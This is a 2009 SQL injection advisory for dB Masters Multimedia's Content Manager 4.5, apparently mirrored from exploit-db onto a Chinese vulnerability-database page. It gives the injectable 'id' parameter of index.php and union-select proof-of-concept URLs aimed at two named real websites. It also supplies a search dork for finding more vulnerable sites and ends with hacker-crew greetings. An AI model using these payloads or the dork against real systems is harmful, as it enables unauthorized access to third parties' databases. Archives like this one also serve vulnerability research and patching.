dB Masters MultiMedia's Content Manager 4.5 - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1058005 漏洞类型
发布时间 2009-07-16 更新时间 2009-07-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9176
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
===========================================================================================


  [o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

       Software : dB Masters Multimedia's Content Manager version 4.5
       Vendor   : http://www.dbmasters.net/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===========================================================================================


  [o] Vulnerable file

       index.php



  [o] Exploit

       http://localhost/[path]/index.php?n=xx&id=[SQL]



  [o] Proof of concept

       http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
       http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--



  [o] Dork

       "Powered by dB Masters Multimedia's Content Manager"


===========================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/news ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===========================================================================================

# milw0rm.com [2009-07-16]